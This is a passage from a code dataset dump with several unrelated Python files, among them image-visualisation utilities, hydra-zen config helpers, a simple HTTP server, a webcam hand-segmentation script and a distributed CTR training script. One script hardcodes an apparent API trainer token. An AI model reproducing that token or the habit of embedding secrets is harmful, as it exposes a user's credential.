_get_names(module, parent_name=\"\"):\n for key, m in module.named_children():\n cls_name = str(m.__class__).split(\".\")[-1].split(\"'\")[0]\n num_named_children = len(list(m.named_children()))\n if num_named_children > 0:\n name = parent_name + \".\" + key if parent_name else key\n else:\n name = parent_name + \".\" + cls_name + \"_\" + key if parent_name else key\n names[name] = m\n\n if isinstance(m, torch.nn.Module):\n _get_names(m, parent_name=name)\n\n _get_names(model)\n return names\n\ndef show_img(imgs, window_names=None, wait_time_ms=0, is_merge=False, row_col_num=(1, -1)):\n \"\"\"\n Displays an image or a list of images in specified windows or self-initiated windows.\n You can also 
control display wait time by parameter 'wait_time_ms'.\n Additionally, this function provides an optional parameter 'is_merge' to\n decide whether to display all imgs in a particular window 'merge'.\n Besides, parameter 'row_col_num' supports user specified merge format.\n Notice, specified format must be greater than or equal to imgs number.\n\n :param imgs: numpy.ndarray or list.\n :param window_names: specified or None, if None, function will create different windows as '1', '2'.\n :param wait_time_ms: display wait time.\n :param is_merge: whether to merge all images.\n :param row_col_num: merge format. default is (1, -1), image will line up to show.\n example=(2, 5), images will display in two rows and five columns.\n \"\"\"\n if not isinstance(imgs, list):\n imgs = [imgs]\n\n if window_names is None:\n window_names = list(range(len(imgs)))\n else:\n if not isinstance(window_names, list):\n window_names = [window_names]\n assert len(imgs) == len(window_names), 'window names do not match images!'\n\n if is_merge:\n merge_imgs1 = merge_imgs(imgs, row_col_num)\n\n cv2.namedWindow('merge', 0)\n cv2.imshow('merge', merge_imgs1)\n else:\n for img, win_name in zip(imgs, window_names):\n if img is None:\n continue\n win_name = str(win_name)\n cv2.namedWindow(win_name, 0)\n cv2.imshow(win_name, img)\n\n cv2.waitKey(wait_time_ms)\n\ndef merge_imgs(imgs, row_col_num):\n \"\"\"\n Merges all input images as an image with specified merge format.\n\n :param imgs : img list\n :param row_col_num : number of rows and columns displayed\n :return img : merges img\n \"\"\"\n\n length = len(imgs)\n row, col = row_col_num\n\n assert row > 0 or col > 0, 'row and col cannot be negative at same time!'\n color = random_color(rgb=True).astype(np.float64)\n\n for img in imgs:\n cv2.rectangle(img, (0, 0), (img.shape[1], img.shape[0]), color)\n\n if row_col_num[1] < 0 or length < row:\n merge_imgs = np.hstack(imgs)\n elif row_col_num[0] < 0 or length < col:\n merge_imgs = np.vstack(imgs)\n else:\n assert row * col >= length, 'Too many imgs: not enough windows to display all of them!'\n\n fill_img_list = [np.zeros(imgs[0].shape, dtype=np.uint8)] * (row * col - length)\n imgs.extend(fill_img_list)\n merge_imgs_col = []\n for i in range(row):\n start = col * i\n end = col * (i + 1)\n merge_col = np.hstack(imgs[start: end])\n merge_imgs_col.append(merge_col)\n\n merge_imgs = np.vstack(merge_imgs_col)\n\n return merge_imgs\n\ndef show_tensor(tensor, resize_hw=None, top_k=50, mode='CHW', is_show=True,\n wait_time_ms=0, show_split=True, is_merge=True, row_col_num=(1, -1)):\n \"\"\"\n\n :param wait_time_ms:\n :param tensor: torch.tensor\n :param resize_hw: list:\n :param top_k: int\n :param mode: string: 'CHW' , 'HWC'\n \"\"\"\n\n def normalize_numpy(array):\n max_value = np.max(array)\n min_value = np.min(array)\n array = (array - min_value) / (max_value - min_value)\n return array\n\n assert tensor.dim() == 3, 'Dim of input tensor should be 3, please check your tensor dimension!'\n\n # the default tensor layout is channel-first (CHW)\n if mode == 'CHW':\n tensor = tensor\n else:\n tensor = tensor.permute(2, 0, 1)\n\n # interpolate with torch's resize, using smooth bilinear interpolation\n if resize_hw is not None:\n tensor = tensor[None]\n tensor = F.interpolate(tensor, resize_hw, mode='bilinear')\n tensor = tensor.squeeze(0)\n\n tensor = tensor.permute(1, 2, 0)\n\n channel = tensor.shape[2]\n\n if tensor.device == 'cpu':\n tensor = tensor.detach().numpy()\n else:\n tensor = tensor.cpu().detach().numpy()\n if not show_split:\n # the summed map can exceed the display range, so normalize it\n sum_tensor = np.sum(tensor, axis=2)\n 
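# rescale to [0, 255] and cast to uint8 so cv2.applyColorMap can render it\n 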
sum_tensor = normalize_numpy(sum_tensor) * 255\n sum_tensor = sum_tensor.astype(np.uint8)\n\n # 热力图显示\n sum_tensor = cv2.applyColorMap(np.uint8(sum_tensor), cv2.COLORMAP_JET)\n # mean_tensor = cv2.applyColorMap(np.uint8(mean_tensor), cv2.COLORMAP_JET)\n\n if is_show:\n show_img([sum_tensor], ['sum'], wait_time_ms=wait_time_ms)\n return [sum_tensor]\n else:\n assert top_k > 0, 'top k should be positive!'\n channel_sum = np.sum(tensor, axis=(0, 1))\n index = np.argsort(channel_sum)\n select_index = index[:top_k]\n tensor = tensor[:, :, select_index]\n tensor = np.clip(tensor, 0, np.max(tensor))\n\n single_tensor_list = []\n if top_k > channel:\n top_k = channel\n for c in range(top_k):\n single_tensor = tensor[..., c]\n single_tensor = normalize_numpy(single_tensor) * 255\n single_tensor = single_tensor.astype(np.uint8)\n\n single_tensor = cv2.applyColorMap(np.uint8(single_tensor), cv2.COLORMAP_JET)\n single_tensor_list.append(single_tensor)\n\n if is_merge:\n return_imgs = merge_imgs(single_tensor_list, row_col_num=row_col_num)\n else:\n return_imgs = single_tensor_list\n\n if is_show:\n show_img(return_imgs, wait_time_ms=wait_time_ms, is_merge=is_merge)\n return return_imgs\n\ndef random_color(rgb=False, maximum=255):\n \"\"\"\n Args:\n rgb (bool): whether to return RGB colors or BGR colors.\n maximum (int): either 255 or 1\n\n Returns:\n ndarray: a vector of 3 numbers\n \"\"\"\n idx = np.random.randint(0, len(_COLORS))\n ret = _COLORS[idx] * maximum\n if not rgb:\n ret = ret[::-1]\n return ret\n\ndef imdenormalize(img, mean, std, to_bgr=True):\n assert img.dtype != np.uint8\n mean = mean.reshape(1, -1).astype(np.float64)\n std = std.reshape(1, -1).astype(np.float64)\n img = cv2.multiply(img, std) # make a copy\n cv2.add(img, mean, img) # inplace\n if to_bgr:\n cv2.cvtColor(img, cv2.COLOR_RGB2BGR, img) # inplace\n return img\n\ndef imwrite(img, file_path, params=None, auto_mkdir=True):\n \"\"\"Write image to file.\n\n Args:\n img (ndarray): Image array to be written.\n file_path (str): Image file path.\n params (None or list): Same as opencv's :func:`imwrite` interface.\n auto_mkdir (bool): If the parent folder of `file_path` does not exist,\n whether to create it automatically.\n\n Returns:\n bool: Successful or not.\n \"\"\"\n if auto_mkdir:\n dir_name = osp.abspath(osp.dirname(file_path))\n mkdir_or_exist(dir_name)\n return cv2.imwrite(file_path, img, params)\n\ndef mkdir_or_exist(dir_name, mode=0o777):\n if dir_name == '':\n return\n dir_name = osp.expanduser(dir_name)\n os.makedirs(dir_name, mode=mode, exist_ok=True)\n\ndef traverse_file_paths(path, extensions, exclude_extensions=None):\n \"\"\"\n Recursively reads all files under given folder, until all files have been ergodic.\n You can also specified file extensions to read or not to read.\n :return: list: path_list contains all wanted files.\n \"\"\"\n\n def is_valid_file(x):\n if exclude_extensions is None:\n return x.lower().endswith(extensions)\n else:\n return x.lower().endswith(extensions) and not x.lower().endswith(exclude_extensions)\n\n # check_file_exist(path)\n if isinstance(extensions, list):\n extensions = tuple(extensions)\n if isinstance(exclude_extensions, list):\n exclude_extensions = tuple(exclude_extensions)\n\n all_list = os.listdir(path)\n path_list = []\n for subpath in all_list:\n path_next = os.path.join(path, subpath)\n if os.path.isdir(path_next):\n path_list.extend(traverse_file_paths(path_next, extensions, exclude_extensions))\n else:\n if is_valid_file(path_next):\n path_list.append(path_next)\n return 
path_list","repo_name":"HUST-OROP/CopperDefect","sub_path":"utils/tools/feature_map_visual/mmdet_mini/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9776,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"4826425247","text":"import os\r\ndef cerrarprograma():\r\n os.system(\"clear\")\r\n\r\ntabla = []\r\nalto = 82\r\ncont1=0\r\nlargo = 42\r\nfor x in range(largo):\r\n for y in range(alto):\r\n if x == 0 or x == largo - 1:\r\n tabla.append(\".\")\r\n elif y == 0 or y == alto - 1:\r\n tabla.append(\".\")\r\n else:\r\n tabla.append(\" \")\r\n matriz= ''.join(tabla)\r\n print(matriz)\r\n tabla=[]\r\nprint(\"MENU\")\r\nprint()\r\nprint(\"1.Agregar una línea\")\r\nprint()\r\nprint(\"2.Agregar una elipse o círculo\")\r\nprint()\r\nprint(\"3.Agregar un rectángulo o cuadrado\")\r\nprint()\r\nprint(\"4.Agregar un triángulo\")\r\nprint()\r\nprint(\"5.Mostrar un Dibujo\")\r\nprint()\r\nprint(\"6.Leer un dibujo\")\r\nprint()\r\nprint(\"7.Grabar un dibujo\")\r\nprint()\r\nprint(\"0.Cerrar programa\")\r\nprint()\r\nn = int(input(\"Selecciona una opción: \"))\r\nif n==0:\r\n cerrarprograma()\r\nif n == 1:\r\n print(\"Por el momento solo funciona en diagonales con punto x y punto y iguales. Próximamente mejorará.\")\r\n x1 = int(input(\"¿Cuál es el x del primer punto?: \"))\r\n while not -1 < x1 < 83:\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n x1 = int(input(\"¿Cuál es el primer punto?: \"))\r\n print(\"Listo\")\r\n y1 = int(input(\"¿Cuál es el y del primer punto?: \"))\r\n while not -1 < y1 < 43 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n y1 = int(input(\"¿Cuál es el y del primer punto?: \"))\r\n print(\"Listo\")\r\n x2 = int(input(\"¿Cuál es el x del segundo punto?: \"))\r\n while not -1 < x2 < 83 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n x2 = int(input(\"¿Cuál es el x del segundo punto?: \"))\r\n print(\"Listo\")\r\n y2 = int(input(\"¿Cuál es el y del segundo punto?: \"))\r\n while not -1 < y2 < 43 :\r\n print(\"Ha escrito un valor inválido para la línea. Escriba de nuevo\")\r\n y2 = int(input(\"¿Cuál es el y del segundo punto?: \"))\r\n print(\"Listo\")\r\n for x in range(largo):\r\n for y in range(alto):\r\n if x == 0 or x == largo - 1:\r\n tabla.append(\".\")\r\n elif y == 0 or y == alto - 1:\r\n tabla.append(\".\")\r\n elif x==x1 and y==y1:\r\n tabla.append('x')\r\n elif x==x2 and y==y2:\r\n tabla.append('x')\r\n elif y2==y or y1==y:\r\n tabla.append(' ')\r\n elif x2>x>x1 and y1>y2:\r\n tabla.append(' ')\r\n elif x==y and x\"\nKNOWN_MUTABLE_TYPES: Set[\n Union[Type[List[Any]], Type[Dict[Any, Any]], Type[Set[Any]]]\n] = {list, dict, set}\n\nT = TypeVar(\"T\")\n\n\n# The typeshed definition of `field` has an inaccurate annotation:\n# https://github.com/python/typeshed/blob/b9e1d7d522fe90b98e07d43a764bbe60216bc2c4/stdlib/dataclasses.pyi#L109\n# This makes it impossible for `make_dataclass` to by type-correct in the eyes of\n# static checkers. See https://github.com/microsoft/pyright/issues/1680 for discussion.\n#\n# We happen to make rather heavy use of `make_dataclass`, thus we..*sigh*.. 
we provide\n# our own overloads for `field`.\n@overload  # `default` and `default_factory` are optional and mutually exclusive.\ndef field(\n    *,\n    default: Any,\n    init: bool = ...,\n    repr: bool = ...,\n    hash: Optional[bool] = ...,\n    compare: bool = ...,\n    metadata: Optional[Mapping[Any, Any]] = ...,\n) -> Field[Any]:  # pragma: no cover\n    ...\n\n\n@overload\ndef field(\n    *,\n    default_factory: Callable[[], Any],\n    init: bool = ...,\n    repr: bool = ...,\n    hash: Optional[bool] = ...,\n    compare: bool = ...,\n    metadata: Optional[Mapping[Any, Any]] = ...,\n) -> Field[Any]:  # pragma: no cover\n    ...\n\n\ndef field(\n    *,\n    default: Any = MISSING,\n    default_factory: Union[Callable[[], Any], Any] = MISSING,\n    init: bool = True,\n    repr: bool = True,\n    hash: Optional[bool] = None,\n    compare: bool = True,\n    metadata: Optional[Mapping[Any, Any]] = None,\n) -> Field[Any]:\n    if default is MISSING:\n        return cast(\n            Field[Any],\n            _field(\n                default_factory=default_factory,\n                init=init,\n                repr=repr,\n                hash=hash,\n                compare=compare,\n                metadata=metadata,\n            ),\n        )\n    else:\n        return cast(\n            Field[Any],\n            _field(\n                default=default,\n                init=init,\n                repr=repr,\n                hash=hash,\n                compare=compare,\n                metadata=metadata,\n            ),\n        )\n\n\ndef safe_name(obj: Any, repr_allowed: bool = True) -> str:\n    \"\"\"Tries to get a descriptive name for an object. Returns '<unknown>'\n    instead of raising - useful for writing descriptive/safe error messages.\"\"\"\n\n    if hasattr(obj, \"__name__\"):\n        return obj.__name__.replace(\"<lambda>\", \"lambda\")\n\n    if repr_allowed and hasattr(obj, \"__repr__\"):\n        return repr(obj).replace(\"<lambda>\", \"lambda\")\n\n    return UNKNOWN_NAME\n\n\ndef is_classmethod(obj: Any) -> bool:\n    \"\"\"\n    https://stackoverflow.com/a/19228282/6592114\n\n    Credit to: Martijn Pieters\n    License: CC BY-SA 4.0 (free to copy/redistribute/remix/transform)\"\"\"\n\n    if not inspect.ismethod(obj):\n        return False\n\n    bound_to = getattr(obj, \"__self__\", None)\n    if not isinstance(bound_to, type):\n        # must be bound to a class\n        return False\n    name = safe_name(obj)\n\n    if name == UNKNOWN_NAME:  # pragma: no cover\n        return False\n\n    for cls in bound_to.__mro__:\n        descriptor = vars(cls).get(name)\n        if descriptor is not None:\n            return isinstance(descriptor, classmethod)\n    return False  # pragma: no cover\n\n\ndef building_error_prefix(target: Any) -> str:\n    return f\"Building: {safe_name(target)} ..\\n\"\n\n\nNoneType = type(None)\n\n\ndef is_interpolated_string(x: Any) -> TypeGuard[InterpStr]:\n    # This is only a necessary check – not a sufficient one – that `x`\n    # is a valid interpolated string. We do not verify that it rigorously\n    # satisfies omegaconf's grammar\n    return isinstance(x, str) and len(x) > 3 and x.startswith(\"${\") and x.endswith(\"}\")\n\n\ndef check_suspicious_interpolations(\n    validated_wrappers: Sequence[Any], zen_meta: Mapping[str, Any], target: Any\n):\n    \"\"\"Looks for patterns among zen_meta fields and interpolated fields in\n    wrappers. 
Relative interpolations pointing to the wrong level will produce\n a warning\"\"\"\n for _w in validated_wrappers:\n if is_interpolated_string(_w):\n _lvl = _w.count(\".\") # level of relative-interp\n _field_name = _w.replace(\".\", \"\")[2:-1]\n if (\n _lvl\n and _field_name in zen_meta\n and _lvl != (1 if len(validated_wrappers) == 1 else 2)\n ):\n _expected = II(\n \".\" * (1 if len(validated_wrappers) == 1 else 2) + _field_name\n )\n\n warnings.warn(\n building_error_prefix(target)\n + f\"A zen-wrapper is specified via the interpolated field, {_w},\"\n f\" along with the meta-field name {_field_name}, however it \"\n f\"appears to point to the wrong level. It is likely you should \"\n f\"change {_w} to {_expected}\"\n )\n yield _expected\n\n\ndef valid_defaults_list(hydra_defaults: Any) -> bool:\n \"\"\"\n Raises\n ------\n HydraZenValidationError: Duplicate _self_ entries\"\"\"\n if not isinstance(hydra_defaults, (list, ListConfig)):\n return False\n\n has_self = False\n for item in hydra_defaults:\n if item == \"_self_\":\n if not has_self:\n has_self = True\n continue\n raise HydraZenValidationError(\n \"`hydra_defaults` cannot have more than one '_self_' entry\"\n )\n\n if isinstance(item, (dict, DictConfig)):\n for k, v in item.items():\n if not isinstance(k, str):\n return False\n\n if (\n not isinstance(v, (str, list, ListConfig))\n and v is not None\n and v != MISSING\n ):\n return False\n elif isinstance(item, str):\n continue\n elif is_dataclass(item):\n # no validation here\n continue\n else:\n return False\n\n if not has_self:\n warnings.warn(\n \"Defaults list is missing `_self_`. See https://hydra.cc/docs/upgrades/1.0_to_1.1/default_composition_order for more information\",\n category=UserWarning,\n )\n return True\n\n\ndef merge_settings(\n user_settings: Optional[ZenConvert], default_settings: AllConvert\n) -> AllConvert:\n \"\"\"Merges settings as `default_settings.update(user_settings)`\"\"\"\n if user_settings is not None and not isinstance(user_settings, Mapping):\n raise TypeError(\n f\"`zen_convert` must be None or Mapping[str, Any] (e.g. dict). Got {user_settings}\"\n )\n settings = default_settings.copy()\n if user_settings:\n for k, v in user_settings.items():\n if k not in convert_types:\n raise ValueError(\n f\"The key `{k}` is not a valid zen_convert setting. The available settings are: {', '.join(sorted(convert_types))}\"\n )\n if not isinstance(v, convert_types[k]):\n raise TypeError(\n f\"Setting {k}={v} specified a value of the wrong type. Expected type: {convert_types[k].__name__}\"\n )\n settings[k] = v\n return settings\n\n\n_DATACLASS_OPTION_KEYS: FrozenSet[str] = (\n DataclassOptions.__required_keys__ | DataclassOptions.__optional_keys__\n)\n\n_STRICT_DATACLASS_OPTION_KEYS: FrozenSet[str] = (\n StrictDataclassOptions.__required_keys__ | StrictDataclassOptions.__optional_keys__\n)\n_STRICT_DATACLASS_OPTION_KEYS.copy()\n\n\ndef parse_dataclass_options(\n options: Mapping[str, Any], include_module: bool = True\n) -> DataclassOptions:\n \"\"\"\n Ensures `options` adheres to `DataclassOptions` and merges hydra-zen defaults\n for missing options.\n\n All valid `@dataclass`/`make_dataclass` options are supported, even for features\n introduced in later versions of Python. 
This function will remove valid options\n that are not supported for by the current Python version.\n\n Parameters\n ----------\n options : Mapping[str, Any]\n User-specified options for `zen_dataclass` to be validated.\n\n Returns\n -------\n DataclassOptions\n\n Examples\n --------\n >>> parse_dataclass_options({})\n {'unsafe_hash': True}\n\n >>> parse_dataclass_options({\"unsafe_hash\": False, \"cls_name\": \"Foo\"})\n {'unsafe_hash': False, 'cls_name': 'Foo'}\n\n >>> parse_dataclass_options({\"moo\": 1})\n ValueError: moo is not a valid dataclass option.\n\n Options that are supported by `make_dataclass` for later versions of\n Python are ignored/removed automatically by this function. E.g. the following\n Python 3.10+ option has the following behavior in Python 3.9:\n\n >>> parse_dataclass_options({\"slots\": False})\n {'unsafe_hash': True}\n \"\"\"\n if not isinstance(options, Mapping):\n raise ValueError(\n f\"`zen_dataclass_options` is expected to be `None` or dict[str, bool]. Got \"\n f\"{options} (type: {type(options)}).\"\n )\n\n merged = DEFAULT_DATACLASS_OPTIONS.copy()\n\n for name, val in options.items():\n if name in UNSUPPORTED_DATACLASS_OPTIONS:\n continue\n elif name not in _DATACLASS_OPTION_KEYS:\n raise ValueError(f\"{name} is not a valid dataclass option.\")\n\n if name == \"module\":\n if val is not None and (\n not isinstance(val, str)\n or not all(\n v.isidentifier() and not iskeyword(v) for v in val.split(\".\")\n )\n ):\n raise ValueError(\n f\"dataclass option `{name}` must be a valid module name, got {val}\"\n )\n\n elif name == \"cls_name\":\n if val is not None and (not isinstance(val, str) or not val.isidentifier()):\n raise ValueError(\n f\"dataclass option `{name}` must be a valid identifier, got {val}\"\n )\n elif name == \"bases\":\n if not isinstance(val, Iterable) or any(\n not (is_dataclass(_b) and isinstance(_b, type)) for _b in val\n ):\n raise TypeError(\n f\"dataclass option `{name}` must be a tuple of dataclass types\"\n )\n elif name == \"namespace\":\n if not isinstance(val, Mapping) or any(\n not isinstance(v, str) or not v.isidentifier() for v in val\n ):\n raise ValueError(\n f\"dataclass option `{name}` must be a mapping with string-valued keys \"\n f\"that are valid identifiers. Got {val}.\"\n )\n elif name == \"target\":\n if not isinstance(val, str) or not all(\n x.isidentifier() for x in val.split(\".\")\n ):\n raise TypeError(\n f\"dataclass option `target` must be a string and an import path, \"\n f\"got {val!r}\"\n )\n elif not isinstance(val, bool):\n raise TypeError(\n f\"dataclass option `{name}` must be of type `bool`. 
Got {val} \"\n f\"(type: {type(val)})\"\n )\n merged[name] = val\n if (\n include_module\n and \"module\" not in merged\n and \"module\" in _STRICT_DATACLASS_OPTION_KEYS\n ): # pragma: no cover\n # For Python 3.12+ we want the default module to\n # remain \"types\" rather than being inferred as some\n # internal hydra-zen module.\n merged[\"module\"] = \"types\"\n return merged\n\n\ndef parse_strict_dataclass_options(\n options: Mapping[str, Any]\n) -> TypeGuard[StrictDataclassOptions]:\n return (\n options.keys() <= _STRICT_DATACLASS_OPTION_KEYS\n and StrictDataclassOptions.__required_keys__ <= options.keys()\n )\n\n\n_HYDRA_CONVERT_OPTIONS = (\n {\"none\", \"partial\", \"all\", \"object\"}\n if HYDRA_SUPPORTS_OBJECT_CONVERT\n else {\"none\", \"partial\", \"all\"}\n)\n\n\ndef validate_hydra_options(\n hydra_recursive: Optional[bool] = None,\n hydra_convert: Optional[Literal[\"none\", \"partial\", \"all\", \"object\"]] = None,\n) -> None:\n if hydra_recursive is not None and not isinstance(hydra_recursive, bool):\n raise TypeError(\n f\"`hydra_recursive` must be a boolean type, got {hydra_recursive}\"\n )\n\n if hydra_convert is not None and hydra_convert not in _HYDRA_CONVERT_OPTIONS:\n raise ValueError(\n f\"`hydra_convert` must be 'none', 'partial',\"\n f\"{' object' if HYDRA_SUPPORTS_OBJECT_CONVERT else ''} or 'all', got: \"\n f\"{hydra_convert}\"\n )\n","repo_name":"mit-ll-responsible-ai/hydra-zen","sub_path":"src/hydra_zen/structured_configs/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":13567,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"18"} +{"seq_id":"31135136275","text":"import requests\r\nimport json\r\ntoken = '181e9195a049ec50a01032126911a7f5'\r\nresponse = requests.post ('https://pokemonbattle.me:5000/pokemons',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token},\r\njson = {\r\n \"name\": \"Opponent\",\r\n \"photo\": \"https://static.wikia.nocookie.net/pokemon/images/2/21/001Bulbasaur.png\"\r\n})\r\npokemon_id = response.json()['id']\r\nresponse_change = requests.put('https://pokemonbattle.me:5000/pokemons',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token}, json ={\r\n \"pokemon_id\": pokemon_id,\r\n \"name\": \"Opponent 78\",\r\n \"photo\": \"\" \r\n })\r\nresponse = requests.post ('https://pokemonbattle.me:5000/pokemons/trainers/add_pokeball',headers = {'Content-Type' : 'application/json',\r\n'trainer_token' : token},\r\njson = {\r\n \"pokemon_id\": \"3186\"\r\n})\r\nprint (response_change.text) ","repo_name":"nikita-shevchukov/python_autotests","sub_path":"test/PythonProjects/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43475328522","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author: xiezizhe\n@Date: 26/2/2020 上午11:13\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if nums is None:\n return 0\n if len(nums) <= 1:\n return len(nums)\n cur_idx, next_idx = 0, 1\n while next_idx < len(nums):\n if nums[next_idx] == nums[cur_idx]:\n while next_idx < len(nums) and nums[next_idx] == nums[cur_idx]:\n next_idx += 1\n if next_idx < len(nums):\n nums[cur_idx + 1] = nums[next_idx]\n else:\n break\n cur_idx += 1\n next_idx += 1\n nums[cur_idx] = nums[next_idx - 1]\n\n return cur_idx + 1\n\n\nif __name__ == '__main__':\n l = [1, 1, 1, 1, 1, 2, 2, 3, 4, 5, 6]\n s = 
Solution()\n print(s.removeDuplicates(l))\n print(l)\n","repo_name":"forrest0402/leetcode","sub_path":"python/26. Remove Duplicates from Sorted Array.py","file_name":"26. Remove Duplicates from Sorted Array.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29705705245","text":"import http.server\nfrom socketserver import ThreadingMixIn\nimport threading\nimport json, re\n\nclass ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):\n allow_reuse_address = True\n def shutdown(self):\n self.socket.close()\n http.server.HTTPServer.shutdown(self)\n\ndef route(path):\n def _route(f):\n setattr(f, '__route__', path)\n return f\n return _route\n\ndef read_params(path):\n query = path.split('?')\n if len(query) > 1:\n query = query[1].split('&')\n return dict(map(lambda x: x.split('='), query))\n\ndef get(req_handler, routes):\n for name, handler in routes.__class__.__dict__.items():\n if hasattr(handler, \"__route__\"):\n if None != re.search(handler.__route__, req_handler.path):\n req_handler.send_response(200)\n req_handler.send_header('Content-Type', 'application/json')\n req_handler.send_header('Access-Control-Allow-Origin', '*')\n req_handler.end_headers()\n params = read_params(req_handler.path)\n data = json.dumps(handler(routes, params)) + '\\n'\n req_handler.wfile.write(bytes(data, encoding = 'utf-8'))\n return\n\ndef run(routes, host = '0.0.0.0', port = 8080):\n class RequestHandler(http.server.BaseHTTPRequestHandler):\n def log_message(self, *args, **kwargs):\n pass\n def do_GET(self):\n get(self, routes)\n server = ThreadedHTTPServer((host, port), RequestHandler)\n thread = threading.Thread(target = server.serve_forever)\n thread.daemon = True\n thread.start()\n print (f\"HTTP server started on port {port}\")\n","repo_name":"paramtt/twitch-custom","sub_path":"server/srv.py","file_name":"srv.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3971502820","text":"import torch.nn as nn\n\nfrom .registry import PLUGIN_LAYERS\n\n\n@PLUGIN_LAYERS.register_module()\nclass Dropout2d_(nn.Dropout2d):\n \"\"\" To fit the plugin interface\n \"\"\"\n\n def __init__(self, in_channels, p, inplace=True):\n super(Dropout2d_, self).__init__(p, inplace=inplace)\n\n\n@PLUGIN_LAYERS.register_module()\nclass SELayer(nn.Module):\n _abbr_ = 'se'\n def __init__(self, in_channels, reduction=16):\n super(SELayer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(in_channels, in_channels // reduction, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(in_channels // reduction, in_channels, bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y.expand_as(x)\n","repo_name":"tfwu/iVMCL-Release","sub_path":"mmcv/mmcv/cnn/bricks/plugin_ivmcl.py","file_name":"plugin_ivmcl.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"3830363981","text":"import numpy as np\r\nimport cv2\r\n\r\n\r\n# Open Camera\r\ncapture = cv2.VideoCapture(0)\r\n\r\nwhile capture.isOpened():\r\n\r\n # Capture frames from the camera\r\n ret, frame = capture.read()\r\n\r\n # Get hand data from the rectangle sub window\r\n cv2.rectangle(frame, (100, 100), (300, 300), (0, 255, 0), 
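\r\n        # Hand-region ROI (matches the crop_image slice below); the final argument is the border thickness.\r\n        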
0)\r\n crop_image = frame[100:300, 100:300]\r\n\r\n # Apply Gaussian blur\r\n blur = cv2.GaussianBlur(crop_image, (3, 3), 0)\r\n\r\n # Change color-space from BGR -> HSV\r\n hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\r\n\r\n # Create a binary image with where white will be skin colors and rest is black\r\n mask2 = cv2.inRange(hsv, np.array([2, 0, 0]), np.array([20, 255, 255]))\r\n cv2.imshow(\"image\",mask2);\r\n\r\n # Kernel for morphological transformation\r\n kernel = np.ones((5, 5))\r\n\r\n # Apply morphological transformations to filter out the background noise\r\n dilation = cv2.dilate(mask2, kernel, iterations=1)\r\n erosion = cv2.erode(dilation, kernel, iterations=1)\r\n\r\n # Apply Gaussian Blur and Threshold\r\n filtered = cv2.GaussianBlur(erosion, (3, 3), 0)\r\n ret, thresh = cv2.threshold(filtered, 127, 255, 0)\r\n#####\r\n #cv2.imshow(\"Threshold\",thresh)\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\n\r\ncapture.release()\r\ncv2.destroyAllWindows()","repo_name":"RashmithaEttadi/HandGestureRecognition","sub_path":"pg2.py","file_name":"pg2.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4099135257","text":"import hetu as ht\nfrom hetu.launcher import launch\nfrom hetu import init\nfrom hetu.gpu_ops.SharedTable import SharedTableOp\nfrom hetu.communicator.mpi_nccl_comm import ncclDataType_t, ncclRedOp_t\n\nfrom models.hetuctr_data import load_dataset\nfrom models.hetuctr_models import WDL, DCN, DFM\n\nimport os.path as osp\nimport numpy as np\nimport yaml\nimport time\nimport argparse\nfrom sklearn import metrics\n\ndef comm_sync_data(comm, *args):\n array = ht.array(args, ht.cpu())\n comm.dlarrayNcclAllReduce(array, array, ncclDataType_t.ncclFloat32, ncclRedOp_t.ncclSum, comm.stream)\n comm.stream.sync()\n return array.asnumpy() / comm.nRanks.value\n\ndef worker(args):\n def train(iterations, auc_enabled=False):\n localiter = range(iterations)\n train_loss = []\n train_acc = []\n if auc_enabled:\n train_auc = []\n for it in localiter:\n loss_val, predict_y, y_val, _ = executor.run('train', convert_to_numpy_ret_vals=True)\n if y_val.shape[1] == 1: # for criteo case\n acc_val = np.equal(\n y_val,\n predict_y > 0.5).astype(float)\n else:\n acc_val = np.equal(\n np.argmax(y_val, 1),\n np.argmax(predict_y, 1)).astype(float)\n train_loss.append(loss_val[0])\n train_acc.append(acc_val)\n if auc_enabled:\n train_auc.append(metrics.roc_auc_score(y_val, predict_y))\n if auc_enabled:\n return np.mean(train_loss), np.mean(train_acc), np.mean(train_auc)\n else:\n return np.mean(train_loss), np.mean(train_acc), 0\n def validate(iterations):\n localiter = range(iterations)\n test_loss = []\n test_acc = []\n test_auc = []\n for it in localiter:\n loss_val, test_y_predicted, y_test_val = executor.run('validate', convert_to_numpy_ret_vals=True)\n if y_test_val.shape[1] == 1: # for criteo case\n correct_prediction = np.equal(\n y_test_val,\n test_y_predicted > 0.5).astype(float)\n else:\n correct_prediction = np.equal(\n np.argmax(y_test_val, 1),\n np.argmax(test_y_predicted, 1)).astype(float)\n test_loss.append(loss_val[0])\n test_acc.append(correct_prediction)\n test_auc.append(metrics.roc_auc_score(y_test_val, 